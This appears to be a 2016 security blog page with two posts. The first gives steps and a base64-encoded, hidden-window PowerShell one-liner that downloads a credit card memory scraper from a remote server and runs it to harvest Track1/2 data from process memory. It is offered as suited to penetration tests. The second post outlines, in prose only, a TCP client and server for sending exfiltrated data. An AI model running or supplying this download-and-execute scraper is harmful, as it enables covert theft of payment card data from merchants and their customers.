Vitali Kremez
  • Home
  • About
  • Contact
  • Cyber Security
  • Cyber Intel
  • Programming
  • Reverse Engineering
  • Exploit Development
  • Penetration Test
  • WIN32 Assembly
  • On Writing
    • Blog
    • LSAT
    • Photo
  • Honeypot
  • Forum

Obfuscated PowerShell Memory Scraping for Credit Cards

7/22/2016

2 Comments

 
Original Source & Inspiration: http://www.shellntel.com/blog/2015/9/16/powershell-cc-memory-scraper

* Non-resident credit card memory scraper, now improved the obfuscation technique using -EncodedCommand 
* One-liner PowerShell script/downloader essentially does its dirty work without any additional malware corpus on the host
* Great for penetration tests of various merchants or for PCI-DSS audit compliance
  • ​​(1) Setup a server with the Memory Scraper download
  • (2) Encode the PowerShell memory scraper using -EncodedCommand (Base64)
  • (3) Allow execution of scripts on the host via powershell.exe Set-ExecutionPolicy Unrestricted
  • (4) Execute the obfuscated script on the host​ that downloads the memory scraper and parses the memory process of notepad.exe for credit card Track1/2 data with Luhn algorithm
 -NoP -NonI -W Hidden -Enc 
  • powershell.exe  ​-exec bypass -NoP -NonI -W Hidden -Enc "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADkAMwA6ADgAMAAwADAALwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACwAJwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACkAOwAuAC8AbQBlAG0AXwBzAGMAcgBhAHAAZQByAC4AcABzADEAIAAtAFAAcgBvAGMAIABuAG8AdABlAHAAYQBkADsA"
Picture

Read More
2 Comments

TCP Proxy Server Communication

7/18/2016

0 Comments

 
Source: Python for Black Hat

I. tcp_client.py (base64-encoded exfiltrated data)
1. Create a socket object
2. Connect the client
3. Send some Base64-encoded data
4. Receive data response =
II. tcp_server.py 0.0.0.0:9999 (original and decoded)
1. Send something
2. Print out what the client sends
3. Send back a packet
4. Spin up our client thread to handle incoming data
Picture
0 Comments

    Author

    Vitali Kremez

    Archives

    July 2016
    May 2016
    January 2016

    Categories

    All

    RSS Feed

Powered by Create your own unique website with customizable templates.
  • Home
  • About
  • Contact
  • Cyber Security
  • Cyber Intel
  • Programming
  • Reverse Engineering
  • Exploit Development
  • Penetration Test
  • WIN32 Assembly
  • On Writing
    • Blog
    • LSAT
    • Photo
  • Honeypot
  • Forum